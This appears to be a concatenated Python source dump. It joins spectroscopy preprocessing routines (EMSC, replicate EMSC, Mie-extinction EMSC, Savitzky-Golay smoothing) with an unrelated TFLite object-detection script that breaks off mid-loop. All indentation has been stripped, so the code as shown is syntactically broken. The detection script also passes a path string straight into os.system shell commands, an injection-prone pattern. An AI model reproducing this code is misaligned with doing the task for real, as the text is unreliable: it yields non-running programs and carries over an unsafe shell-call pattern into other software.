polynomial_columns = [np.ones(len(wavenumbers))]
for j in range(1, poly_order + 1):
polynomial_columns.append(normalized_wns ** j)
polynomial_columns = np.stack(polynomial_columns, axis=1)
# spectrum = X*coefs + residues
# least squares -> A = (X.T*X)^-1 * X.T; coefs = A * spectrum
if constituents is None:
columns = (reference, polynomial_columns)
else:
columns = (reference, constituents.T, polynomial_columns)
if not use_reference: columns = columns[1:]
if isinstance(columns, tuple):
X = np.concatenate(columns, axis=1)
else:
X = columns.copy()
A = np.dot(np.linalg.pinv(np.dot(X.T, X)), X.T)
spectra_columns = spectra.T
coefs = np.dot(A, spectra_columns)
residues = spectra_columns - np.dot(X, coefs)
if use_reference:
preprocessed_spectra = residues / coefs[0] + reference
else:
preprocessed_spectra = residues.copy()
if return_coefs:
return preprocessed_spectra.T, coefs.T
return preprocessed_spectra.T
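# Illustrative call (a sketch; spectra is assumed to be [n_samples, n_channels]
# and wavenumbers [n_channels], both provided by the calling code):
#   corrected, coefs = emsc(spectra, wavenumbers, poly_order=2, return_coefs=True)
#   scaling = coefs[:, 0]   # per-sample reference (multiplicative) coefficient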
def rep_emsc(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
n_comp: int = 1,
use_reference: bool = True,
return_coefs: bool = False):
"""
Preprocess all spectra with replicate EMSC
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
:param n_comp: number of principal components used for replicate correction
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
[n_samples, n_coeffs], where n_coeffs = 1 + n_comp + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
n) r_0*loading_rep[0] + ... + r_n*loading_rep[n] + # replicate coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:return: preprocessed spectra, [coefficients]
"""
constituents = cal_rep_matrix(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
do_PCA=True,
n_comp=n_comp)[1]
res = emsc(spectra=spectra,
wavenumbers=wavenumbers,
poly_order=poly_order,
reference=reference,
constituents=constituents,
use_reference=use_reference,
return_coefs=return_coefs)
return res
def cal_rep_matrix(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
do_PCA: bool = False,
n_comp: int = 1):
"""
Calculate mean spectra for each replicate, and do PCA if required
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param do_PCA: if True returns loadings from PCA
:param n_comp: number of principal components used for replicate correction
:return: mean spectra of each replicate
"""
n_rep = len(replicate)
n_sample = np.shape(spectra)[0]
assert n_rep == n_sample
rep_mean = []
rep_uni = np.unique(replicate)
#### replace for loop with map ####
rep_mean = list(map(lambda x: np.mean(spectra[replicate == x, :], axis=0), rep_uni))
# for j in range(len(rep_uni)):
# rep_mean.append(np.mean(spectra[replicate==rep_uni[j],:], axis=0))
rep_mean = np.stack(rep_mean, axis=0)
if do_PCA:
n_comp = np.min((n_rep, n_comp))
model_pca = PCA(n_comp)
rep_mean_c = rep_mean - np.mean(rep_mean, axis=0)
rep_columns = model_pca.fit(rep_mean_c).components_
return rep_mean, rep_columns
else:
return rep_mean
def cal_merit_lda(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
label: np.ndarray):
"""
Benchmark of replicate EMSC correction based on LDA classification
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param label: ndarray of shape [n_samples]
:return: mean sensitivity of leave-one-replicate-out cross-validation
"""
logo = LeaveOneGroupOut()
res_true = []
res_pred = []
for train, test in logo.split(spectra, label, groups=replicate):
tmp_model = LinearDiscriminantAnalysis()
tmp_model.fit(spectra[train], label[train])
res_pred = np.append(res_pred, tmp_model.predict(spectra[test]))
res_true = np.append(res_true, label[test])
c_m = confusion_matrix(res_true, res_pred, labels=np.unique(label))
res = np.mean(np.diag(c_m) / np.sum(c_m, axis=1))
return res
def rep_emsc_opt(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
label: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
n_comp_all: np.ndarray = (1, 2, 3),
use_reference: bool = True,
return_coefs: bool = False,
fun_merit=cal_merit_lda,
do_correction: bool = True):
"""
    Preprocess all spectra with replicate EMSC, with automatic optimization of n_comp
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param label: ndarray of shape [n_samples]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
    :param n_comp_all: candidate numbers of principal components
used for replicate correction
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
[n_samples, n_coeffs], where n_coeffs = 1 + n_comp + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
n) r_0*loading_rep[0] + ... + r_n*loading_rep[n] + # replicate coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:param fun_merit: function used to calculate the merits
benchmarking the goodness of replicate correction
:param do_correction: if or not do replicate EMSC correction using optimal n_comp
:return: [preprocessed spectra, [coefficients]], merits, opt_comp
"""
uni_rep = np.unique(replicate)
merits = []
for n_comp in n_comp_all:
if n_comp >= len(uni_rep): break
prep_spectra = rep_emsc(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
poly_order=poly_order,
reference=reference,
n_comp=n_comp,
use_reference=use_reference,
return_coefs=False)
met = fun_merit(spectra=prep_spectra,
wavenumbers=wavenumbers,
replicate=replicate,
label=label)
merits.append(met)
opt_comp = n_comp_all[np.argmax(merits)]
if do_correction:
res = rep_emsc(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
poly_order=poly_order,
reference=reference,
n_comp=opt_comp,
use_reference=use_reference,
return_coefs=return_coefs)
return res, merits, opt_comp
else:
return merits, opt_comp
# ---------------------------------------------------------------------------------------------------
# The following Part Is Based On Norway Biospectools
# ---------------------------------------------------------------------------------------------------
import numpy as np
class EmptyCriterionError(Exception):
pass
class BaseStopCriterion:
def __init__(self, max_iter):
self.max_iter = max_iter
self.reset()
def reset(self):
self.best_idx = 0
self.scores = []
self.values = []
def add(self, score, value=None):
self.scores.append(score)
self.values.append(value)
self._update_best(score)
def _update_best(self, score):
if score < self.scores[self.best_idx]:
self.best_idx = len(self.scores) - 1
def __bool__(self):
return self.cur_iter == self.max_iter or bool(self._stop())
@property
def cur_iter(self):
return len(self.scores)
@property
def best_score(self):
if len(self.scores) == 0:
raise EmptyCriterionError('No scores were added')
return self.scores[self.best_idx]
@property
def best_value(self):
if len(self.values) == 0:
raise EmptyCriterionError('No scores were added')
return self.values[self.best_idx]
@property
def best_iter(self):
if len(self.scores) == 0:
raise EmptyCriterionError('No scores were added')
if self.best_idx >= 0:
return self.best_idx + 1
else:
return len(self.scores) - self.best_idx + 1
def _stop(self) -> bool:
return False
class MatlabStopCriterion(BaseStopCriterion):
def __init__(self, max_iter, precision=None):
super().__init__(max_iter)
self.precision = precision
self._eps = np.finfo(float).eps
def _stop(self) -> bool:
if self.cur_iter <= 2:
return False
pp_rmse, p_rmse, rmse = [round(r, self.precision)
for r in self.scores[-3:]]
return rmse > p_rmse or pp_rmse - rmse <= self._eps
class TolStopCriterion(BaseStopCriterion):
def __init__(self, max_iter, tol, patience):
super().__init__(max_iter)
self.tol = tol
self.patience = patience
def _update_best(self, score):
if score + self.tol < self.best_score:
self.best_idx = len(self.scores) - 1
def _stop(self) -> bool:
if self.cur_iter <= self.patience + 1:
return False
no_update_iters = self.cur_iter - self.best_iter
return no_update_iters > self.patience
# ---------------------------------------------------------------------------------------
import logging
from typing import Union as U, Tuple as T, Optional as O
import numpy as np
class EMSCInternals:
"""Class that contains intermediate results of EMSC algorithm.
Parameters
----------
    coefs : `(N_samples, 1 + N_constituents + (poly_order + 1)) ndarray`
All coefficients for each transformed sample. First column is a
scaling parameter followed by constituent and polynomial coefs.
This is a transposed solution of equation
_model @ coefs.T = spectrum.
scaling_coefs : `(N_samples,) ndarray`
Scaling coefficients (reference to the first column of coefs_).
polynomial_coefs : `(N_samples, poly_order + 1) ndarray`
Coefficients for each polynomial order.
constituents_coefs : `(N_samples, N_constituents) ndarray`
Coefficients for each constituent.
residuals : `(N_samples, K_channels) ndarray`
Chemical residuals that were not fitted by EMSC model.
Raises
------
AttributeError
When polynomial's or constituents' coeffs are not available.
"""
def __init__(
self,
coefs: np.ndarray,
residuals: np.ndarray,
poly_order: O[int],
constituents: O[np.ndarray]):
assert len(coefs.T) == len(residuals), 'Inconsistent number of spectra'
self.coefs = coefs.T
self.residuals = residuals
if constituents is not None:
self._n_constituents = len(constituents)
else:
self._n_constituents = 0
if poly_order is not None:
self._n_polynomials = poly_order
else:
self._n_polynomials = 0
@property
def scaling_coefs(self) -> np.ndarray:
return self.coefs[:, 0]
@property
def constituents_coefs(self) -> np.ndarray:
if self._n_constituents == 0:
raise AttributeError(
'constituents were not set up. '
'Did you forget to call transform?')
return self.coefs[:, 1:1 + self._n_constituents]
@property
def polynomial_coefs(self) -> np.ndarray:
if self._n_polynomials == 0:
raise AttributeError(
'poly_order was not set up. '
'Did you forget to call transform?')
return self.coefs[:, 1 + self._n_constituents:]
class EMSC:
"""Extended multiplicative signal correction (EMSC) [1]_.
Parameters
----------
reference : `(K_channels,) ndarray`
Reference spectrum.
wavenumbers : `(K_channels,) ndarray`, optional
Wavenumbers must be passed if given polynomial order
is greater than zero.
poly_order : `int`, optional (default 2)
Order of polynomial to be used in regression model. If None
then polynomial will be not used.
weights : `(K_channels,) ndarray`, optional
Weights for spectra.
constituents : `(N_constituents, K_channels) np.ndarray`, optional
Chemical constituents for regression model [2]. Can be used to add
orthogonal vectors.
scale : `bool`, default True
If True then spectra will be scaled to reference spectrum.
rebuild_model : `bool`, default True
If True, then model will be built each time transform is called,
this allows to dynamically change parameters of EMSC class.
Otherwise model will be built once (for speed).
Other Parameters
----------------
    _model : `(K_channels, 1 + N_constituents + (poly_order + 1)) ndarray`
Matrix that is used to solve least squares. First column is a
reference spectrum followed by constituents and polynomial columns.
_norm_wns : `(K_channels,) ndarray`
Normalized wavenumbers to -1, 1 range
References
----------
.. [1] A. Kohler et al. *EMSC: Extended multiplicative
signal correction as a tool for separation and
characterization of physical and chemical
information in fourier transform infrared
microscopy images of cryo-sections of
beef loin.* Applied spectroscopy, 59(6):707–716, 2005.
"""
# TODO: Add numpy typing for array-like objects?
def __init__(
self,
reference,
wavenumbers=None,
poly_order: O[int] = 2,
constituents=None,
weights=None,
scale: bool = True,
rebuild_model: bool = True,
):
self.reference = np.asarray(reference)
self.wavenumbers = wavenumbers
if self.wavenumbers is not None:
self.wavenumbers = np.asarray(wavenumbers)
self.poly_order = poly_order
self.weights = weights
if self.weights is not None:
self.weights = np.asarray(weights)
self.constituents = constituents
if self.constituents is not None:
self.constituents = np.asarray(constituents)
self.scale = scale
self.rebuild_model = rebuild_model
# lazy init during transform
# allows to change dynamically EMSC's parameters
self._model = None
self._norm_wns = None
def transform(
self,
spectra,
internals: bool = False,
check_correlation: bool = True) \
-> U[np.ndarray, T[np.ndarray, EMSCInternals]]:
spectra = np.asarray(spectra)
self._validate_inputs()
if check_correlation:
self._check_high_correlation(spectra)
if self.rebuild_model or self._model is None:
self._norm_wns = self._normalize_wns()
self._model = self._build_model()
coefs = self._solve_lstsq(spectra)
residuals = spectra - np.dot(self._model, coefs).T
scaling = coefs[0]
corr = self.reference + residuals / scaling[:, None]
if not self.scale:
corr *= scaling[:, None]
if internals:
internals_ = EMSCInternals(
coefs, residuals, self.poly_order, self.constituents)
return corr, internals_
return corr
def clear_state(self):
del self._model
del self._norm_wns
def _build_model(self):
columns = [self.reference]
if self.constituents is not None:
columns.extend(self.constituents)
if self.poly_order is not None:
columns.append(np.ones_like(self.reference))
if self.poly_order > 0:
n = self.poly_order + 1
columns.extend(self._norm_wns ** pwr for pwr in range(1, n))
return np.stack(columns, axis=1)
def _solve_lstsq(self, spectra):
if self.weights is None:
return np.linalg.lstsq(self._model, spectra.T, rcond=None)[0]
else:
w = self.weights[:, None]
return np.linalg.lstsq(self._model * w, spectra.T * w, rcond=None)[0]
def _validate_inputs(self):
if (self.poly_order is not None
and self.poly_order < 0):
raise ValueError(
'poly_order must be equal or greater than 0')
if (self.poly_order is not None
and self.poly_order > 0
and self.wavenumbers is None):
raise ValueError(
'wavenumbers must be specified when poly_order is given')
if (self.wavenumbers is not None
and len(self.wavenumbers) != len(self.reference)):
raise ValueError(
"Shape of wavenumbers doesn't match reference spectrum")
def _check_high_correlation(self, spectra):
mean = spectra.mean(axis=0)
score = np.corrcoef(mean, self.reference)[0, 1]
if score < 0.7:
logging.warning(
f'Low pearson score {score:.2f} between mean and reference '
f'spectrum. Make sure that reference spectrum given in '
f'the same order as spectra.')
def _normalize_wns(self):
if self.wavenumbers is None:
return None
half_rng = np.abs(self.wavenumbers[0] - self.wavenumbers[-1]) / 2
return (self.wavenumbers - np.mean(self.wavenumbers)) / half_rng
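# Illustrative usage of the EMSC class above (a sketch; spectra and wavenumbers
# are assumed arrays of shape [n_samples, n_channels] and [n_channels]):
#   model = EMSC(reference=spectra.mean(axis=0), wavenumbers=wavenumbers, poly_order=2)
#   corrected, internals = model.transform(spectra, internals=True)
#   scaling = internals.scaling_coefs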
def emsc(
spectra: np.ndarray,
wavenumbers: np.ndarray,
poly_order: O[int] = 2,
reference: np.ndarray = None,
weights: np.ndarray = None,
constituents: np.ndarray = None,
return_coefs: bool = False,
return_residuals: bool = False) -> U[np.ndarray, T[np.ndarray, np.ndarray],
T[np.ndarray, np.ndarray, np.ndarray]]:
"""Preprocess all spectra with EMSC algorithm [1]_.
Parameters
----------
spectra : `(N_samples, K_channels) np.ndarray`
Spectra to be processed.
wavenumbers : `(K_channels,) ndarray`
Wavenumbers.
poly_order : `int`, optional
Order of polynomial to be used in regression model. If None
then polynomial will be not used. (2, by default)
reference : `(K_channels,) ndarray`, optional
Reference spectrum. If None, then average will be computed.
weights : `(K_channels,) ndarray`, optional
Weights for spectra.
constituents : `(N_constituents, K_channels) np.ndarray`, optional
Chemical constituents for regression model [2]. Can be used to add
orthogonal vectors.
return_coefs : `bool`, optional
Return coefficients.
return_residuals : `bool`, optional
Return residuals.
Returns
-------
preprocessed_spectra : `(N_samples, K_channels) ndarray`
    coefficients : `(N_samples, 1 + N_constituents + (poly_order + 1)) ndarray`, optional
If ``return_coefs`` is true, then returns coefficients in the
following order:
        #. Scaling parameters, b (related to reference spectrum)
        #. All constituents' parameters in the same order as they were given
#. Polynomial coefficients (slope, quadratic effect and so on)
residuals: `(N_samples, K_channels) ndarray`, optional
If ``return_residuals`` is true, then returns residuals
References
----------
.. [1] A. Kohler et al. *EMSC: Extended multiplicative
signal correction as a tool for separation and
characterization of physical and chemical
information in fourier transform infrared
microscopy images of cryo-sections of
beef loin.* Applied spectroscopy, 59(6):707–716, 2005.
"""
assert poly_order is None or poly_order >= 0, 'poly_order must be >= 0'
if reference is None:
reference = np.mean(spectra, axis=0)
# solve for coefs: X @ coefs = spectrum (column)
# (1) build matrix X = [reference constituents polynomial]
columns = [reference]
if constituents is not None:
columns.extend(constituents)
if poly_order is not None:
norm_wns = _normalize_wavenumbers(wavenumbers)
columns.append(np.ones_like(norm_wns))
for j in range(1, poly_order + 1):
columns.append(norm_wns ** j)
X = np.stack(columns, axis=1)
# (2) Calculate coefs
if weights is None:
coefs = np.linalg.lstsq(X, spectra.T, rcond=None)[0]
else:
w = weights[:, None]
coefs = np.linalg.lstsq(X * w, spectra.T * w, rcond=None)[0]
# (3) Preprocessing
residuals = spectra.T - np.dot(X, coefs)
preprocessed_spectra = reference[:, None] + residuals / coefs[0]
# (4) return results
if return_residuals and return_coefs:
return preprocessed_spectra.T, coefs.T, residuals.T
elif return_coefs:
return preprocessed_spectra.T, coefs.T
elif return_residuals:
return preprocessed_spectra.T, residuals.T
return preprocessed_spectra.T
def _normalize_wavenumbers(wns: np.ndarray):
half_rng = np.abs(wns[0] - wns[-1]) / 2
return (wns - np.mean(wns)) / half_rng
# -----------------------------------------------------------------------------------------------
from typing import Optional, List, Union as U, Tuple as T
import copy
import numpy as np
from sklearn.decomposition import TruncatedSVD
from scipy.signal import hilbert
from scipy.interpolate import interp1d
import numexpr as ne
# from biospectools.preprocessing import EMSC
# from biospectools.preprocessing.emsc import EMSCInternals
# from biospectools.preprocessing.criterions import \
# BaseStopCriterion, TolStopCriterion, EmptyCriterionError
class MeEMSCInternals:
coefs: np.ndarray
residuals: np.ndarray
emscs: List[Optional[EMSC]]
criterions: List[BaseStopCriterion]
rmses: np.ndarray
n_iterations: np.ndarray
n_mie_components: int
def __init__(
self,
criterions: List[BaseStopCriterion],
n_mie_components: int):
self.criterions = criterions
self.n_mie_components = n_mie_components
if self.n_mie_components <= 0:
raise ValueError('n_components must be greater than 0')
self._extract_from_criterions()
def _extract_from_criterions(self):
self.emscs = []
np_arrs = [[] for _ in range(4)]
rmses, iters, coefs, resds = np_arrs
for c in self.criterions:
try:
self.emscs.append(c.best_value['emsc'])
emsc_inns: EMSCInternals = c.best_value['internals']
coefs.append(emsc_inns.coefs[0])
resds.append(emsc_inns.residuals[0])
rmses.append(c.best_score)
iters.append(c.best_iter)
except EmptyCriterionError:
self.emscs.append(None)
coefs.append(np.nan)
resds.append(np.nan)
rmses.append(np.nan)
iters.append(0)
self.rmses, self.n_iterations, self.coefs, self.residuals = \
[np.array(np.broadcast_arrays(*arr)) for arr in np_arrs]
@property
def scaling_coefs(self) -> np.ndarray:
return self.coefs[:, 0]
@property
def mie_components_coefs(self) -> np.ndarray:
assert self.n_mie_components > 0, \
'Number of mie components must be greater than zero'
return self.coefs[:, 1:1 + self.n_mie_components]
@property
def polynomial_coefs(self) -> np.ndarray:
return self.coefs[:, -1:]
class MeEMSC:
def __init__(
self,
reference: np.ndarray,
wavenumbers: np.ndarray,
n_components: Optional[int] = None,
n0s: np.ndarray = None,
radiuses: np.ndarray = None,
h: float = 0.25,
weights: np.ndarray = None,
max_iter: int = 30,
tol: float = 1e-4,
patience: int = 1,
positive_ref: bool = True,
verbose: bool = False):
self.reference = reference
self.wavenumbers = wavenumbers
self.weights = weights
self.mie_generator = MatlabMieCurvesGenerator(n0s, radiuses, h)
self.mie_decomposer = MatlabMieCurvesDecomposer(n_components)
self.stop_criterion = TolStopCriterion(max_iter, tol, patience)
self.positive_ref = positive_ref
self.verbose = verbose
def transform(self, spectra: np.ndarray, internals=False) \
-> U[np.ndarray, T[np.ndarray, MeEMSCInternals]]:
ref_x = self.reference
if self.positive_ref:
ref_x[ref_x < 0] = 0
basic_emsc = EMSC(ref_x, self.wavenumbers, rebuild_model=False)
correcteds = []
criterions = []
for spectrum in spectra:
try:
result = self._correct_spectrum(basic_emsc, ref_x, spectrum)
except np.linalg.LinAlgError:
result = np.full_like(self.wavenumbers, np.nan)
correcteds.append(result)
if internals:
criterions.append(copy.copy(self.stop_criterion))
if internals:
inns = MeEMSCInternals(criterions, self.mie_decomposer.n_components)
return np.array(correcteds), inns
return np.array(correcteds)
def _correct_spectrum(self, basic_emsc, pure_guess, spectrum):
self.stop_criterion.reset()
while not self.stop_criterion:
emsc = self._build_emsc(pure_guess, basic_emsc)
pure_guess, inn = emsc.transform(
spectrum[None], internals=True, check_correlation=False)
pure_guess = pure_guess[0]
rmse = np.sqrt(np.mean(inn.residuals ** 2))
iter_result = \
{'corrected': pure_guess, 'internals': inn, 'emsc': emsc}
self.stop_criterion.add(rmse, iter_result)
return self.stop_criterion.best_value['corrected']
def _build_emsc(self, reference, basic_emsc: EMSC) -> EMSC:
# scale with basic EMSC:
reference = basic_emsc.transform(
reference[None], check_correlation=False)[0]
if np.all(np.isnan(reference)):
raise np.linalg.LinAlgError()
if self.weights is not None:
reference *= self.weights
if self.positive_ref:
reference[reference < 0] = 0
qexts = self.mie_generator.generate(reference, self.wavenumbers)
qexts = self._orthogonalize(qexts, reference)
components = self.mie_decomposer.find_orthogonal_components(qexts)
emsc = EMSC(reference, poly_order=0, constituents=components)
return emsc
def _orthogonalize(self, qext: np.ndarray, reference: np.ndarray):
rnorm = reference / np.linalg.norm(reference)
s = np.dot(qext, rnorm)[:, None]
qext_orthogonalized = qext - s * rnorm
return qext_orthogonalized
class MatlabMieCurvesGenerator:
def __init__(self, n0s=None, rs=None, h=0.25):
self.rs = rs if rs is not None else np.linspace(2, 7.1, 10)
self.n0s = n0s if n0s is not None else np.linspace(1.1, 1.4, 10)
self.h = h
self.rs = self.rs * 1e-6
self.alpha0s = 4 * np.pi * self.rs * (self.n0s - 1)
optical_depths = 0.5 * np.pi * self.rs
fs = self.h * np.log(10) / (4 * np.pi * optical_depths)
self.gammas = fs / (self.n0s - 1)
# prepare for broadcasting (alpha, gamma, wns)
self.alpha0s = self.alpha0s[:, None, None]
self.gammas = self.gammas[None, :, None]
def generate(self, pure_absorbance, wavenumbers):
wavenumbers = wavenumbers * 100
nprs, nkks = self._get_refractive_index(pure_absorbance, wavenumbers)
qexts = self._calculate_qext_curves(nprs, nkks, wavenumbers)
return qexts
def _calculate_qext_curves(self, nprs, nkks, wavenumbers):
rho = self.alpha0s * (1 + self.gammas * nkks) * wavenumbers
tanbeta = nprs / (1 / self.gammas + nkks)
beta = np.arctan(tanbeta)
qexts = ne.evaluate(
'2 - 4 * exp(-rho * tanbeta) * cos(beta) / rho * sin(rho - beta)'
'- 4 * exp(-rho * tanbeta) * (cos(beta) / rho) ** 2 * cos(rho - 2 * beta)'
'+ 4 * (cos(beta) / rho) ** 2 * cos(2 * beta)')
return qexts.reshape(-1, len(wavenumbers))
def _get_refractive_index(self, pure_absorbance, wavenumbers):
pad_size = 200
# Extend absorbance spectrum
wns_ext = self._extrapolate_wns(wavenumbers, pad_size)
pure_ext = np.pad(pure_absorbance, pad_size, mode='edge')
# Calculate refractive index
nprs_ext = pure_ext / wns_ext
nkks_ext = hilbert(nprs_ext).imag
if wns_ext[0] < wns_ext[1]:
nkks_ext *= -1
nprs = nprs_ext[pad_size:-pad_size]
nkks = nkks_ext[pad_size:-pad_size]
return nprs, nkks
def _extrapolate_wns(self, wns, pad_size):
f = interp1d(np.arange(len(wns)), wns, fill_value='extrapolate')
idxs_ext = np.arange(-pad_size, len(wns) + pad_size)
wns_ext = f(idxs_ext)
return wns_ext
class MatlabMieCurvesDecomposer:
def __init__(self, n_components: Optional[int]):
self.n_components = n_components
self.svd = TruncatedSVD(self.n_components, n_iter=7)
self.max_components = 30
self.explained_thresh = 99.96
def find_orthogonal_components(self, qexts: np.ndarray):
if self.n_components is None:
self.n_components = self._estimate_n_components(qexts)
self.svd.n_components = self.n_components
# do not refit svd, since it was fitted during _estimation
return self.svd.components_[:self.n_components]
self.svd.fit(qexts)
return self.svd.components_
def _estimate_n_components(self, qexts: np.ndarray):
self.svd.n_components = min(self.max_components, qexts.shape[-1] - 1)
self.svd.fit(qexts)
# svd.explained_variance_ is not used since
# it is not consistent with matlab code
lda = self.svd.singular_values_ ** 2
explained_var = np.cumsum(lda / np.sum(lda)) * 100
n_comp = np.argmax(explained_var > self.explained_thresh) + 1
return n_comp
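# Illustrative usage of the Mie-extinction EMSC correction defined above (a sketch;
# reference_spectrum, wavenumbers and spectra are assumed inputs):
#   me_emsc = MeEMSC(reference=reference_spectrum, wavenumbers=wavenumbers)
#   corrected = me_emsc.transform(spectra)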
# ----------------------------------------------------------------------------------------------------------
def savitzky_golay_filter(y, window_size, order, deriv=0, rate=1):
"""
Based on this : https://scipy.github.io/old-wiki/pages/Cookbook/SavitzkyGolay
Parameters
----------
y : array_like, shape (N,)
the values of the time history of the signal.
window_size : int
the length of the window. Must be an odd integer number.
order : int
the order of the polynomial used in the filtering.
        Must be less than `window_size` - 1.
    deriv: int
        the order of the derivative to compute (default = 0 means smoothing only)
    Returns
    -------
    ys : ndarray, shape (N)
        the smoothed signal (or its n-th derivative).
Notes
-----
The Savitzky-Golay is a type of low-pass filter, particularly
suited for smoothing noisy data. The main idea behind this
    approach is to make for each point a least-squares fit with a
    polynomial of high order over an odd-sized window centered at
the point.
Examples
--------
t = np.linspace(-4, 4, 500)
y = np.exp( -t**2 ) + np.random.normal(0, 0.05, t.shape)
ysg = savitzky_golay(y, window_size=31, order=4)
import matplotlib.pyplot as plt
plt.plot(t, y, label='Noisy signal')
plt.plot(t, np.exp(-t**2), 'k', lw=1.5, label='Original signal')
plt.plot(t, ysg, 'r', label='Filtered signal')
plt.legend()
plt.show()
References
----------
.. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
Data by Simplified Least Squares Procedures. Analytical
Chemistry, 1964, 36 (8), pp 1627-1639.
.. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing
W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. Flannery
Cambridge University Press ISBN-13: 9780521880688
"""
import numpy as np
from math import factorial
# TODO:
# import jax
# import jax.numpy as jnp
    try:
        window_size = abs(int(window_size))
        order = abs(int(order))
    except ValueError:
        raise ValueError("window_size and order have to be of type int")
if window_size % 2 != 1 or window_size < 1:
raise TypeError("window_size size must be a positive odd number")
if window_size < order + 2:
raise TypeError("window_size is too small for the polynomials order")
order_range = range(order + 1)
half_window = (window_size - 1) // 2
# precompute coefficients
    b = np.array([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])
    m = np.linalg.pinv(b)[deriv] * rate ** deriv * factorial(deriv)
# pad the signal at the extremes with
# values taken from the signal itself
firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])
lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])
y = np.concatenate((firstvals, y, lastvals))
return np.convolve(m[::-1], y, mode='valid')
def savitzky_golay(y, window_size, order, deriv=0, rate=1, array=True):
    """Apply savitzky_golay_filter to one spectrum or to a batch of spectra.

    If array is True, y is treated as a 2-D array of shape (number of spectra,
    data points) and the filter is applied row by row; otherwise y is a single
    1-D spectrum.
    """
    if array:
        return np.array([savitzky_golay_filter(xi, window_size, order, deriv=deriv, rate=rate) for xi in y])
    else:
        return savitzky_golay_filter(y, window_size, order, deriv=deriv, rate=rate)
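# Illustrative usage mirroring the docstring example above (array=False because a
# single 1-D spectrum is passed):
#   t = np.linspace(-4, 4, 500)
#   y = np.exp(-t ** 2) + np.random.normal(0, 0.05, t.shape)
#   y_smooth = savitzky_golay(y, window_size=31, order=4, array=False)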
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example using TFLite to detect objects in a given image datasets."""
from PIL import Image
from PIL import ImageDraw
import os
import detect
import tflite_runtime.interpreter as tflite
import platform
import datetime
import cv2
import time
import numpy as np
import io
from io import BytesIO
from flask import Flask, request, Response, jsonify
import random
import re
confThreshold = 0.5
app = Flask(__name__)
def load_labels(path, encoding='utf-8'):
"""Loads labels from file (with or without index numbers).
Args:
path: path to label file.
encoding: label file encoding.
Returns:
Dictionary mapping indices to labels.
"""
with open(path, 'r', encoding=encoding) as f:
lines = f.readlines()
if not lines:
return {}
if lines[0].split(' ', maxsplit=1)[0].isdigit():
pairs = [line.split(' ', maxsplit=1) for line in lines]
return {int(index): label.strip() for index, label in pairs}
else:
return {index: line.strip() for index, line in enumerate(lines)}
def make_interpreter(model_file):
return tflite.Interpreter(model_path=model_file)
def draw_objects(draw, objs, labels):
"""Draws the bounding box and label for each object."""
for obj in objs:
bbox = obj.bbox
rgbl=[255,0,0]
random.shuffle(rgbl)
color=tuple(rgbl)
draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)],
outline=color)
draw.text((bbox.xmin + 10, bbox.ymin + 10),
'%s\n%.2f' % (labels.get(obj.id, obj.id), obj.score),
fill=color)
def detection_loop(filename_image, path, output):
labels = load_labels(labelsPath) if labelsPath else {}
interpreter = make_interpreter(modelPath)
interpreter.allocate_tensors()
summ = 0
#check if folder results exists, otherwise make it and make it accessible
if (os.path.isdir(path+'results') == False):
#print("The output folder " + output + " does not exist! It will be created")
os.system("mkdir " + path + "results")
#os.system("sudo chmod 777 ./results")
#make output.txt for results of the inference and make it accessible
os.system("touch "+ path + "results/output.txt")
#os.system("sudo chmod 777 ./results/output.txt")
no_files = len(filename_image)
for filename, image in filename_image.items():
#image = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
#image = Image.fromarray(image)
scale = detect.set_input(interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))
for _ in range(1):
start = time.perf_counter()
#run inference by invoking the Interpreter
interpreter.invoke()
#calculate inference time
inference_time = time.perf_counter() - start
#get the output data
objs = detect.get_output(interpreter,confThreshold,scale)
print('\n\nIT TOOK %.2f ms' % (inference_time * 1000) + " on image " + filename + "\n")
summ=summ+(inference_time * 1000)
#os.chmod("./results/output.txt", 0o777)
with open (path+"results/output.txt", "a") as f:
f.write(
"%f \n" % (inference_time * 1000)
)
print ('--------RESULTS--------')
if not objs:
#with open (path+"results/output.txt", "a") as f:
# f.write("No objects detected"
# )
print('No objects detected')
for obj in objs:
#with open (path+"results/output.txt", "a") as f:
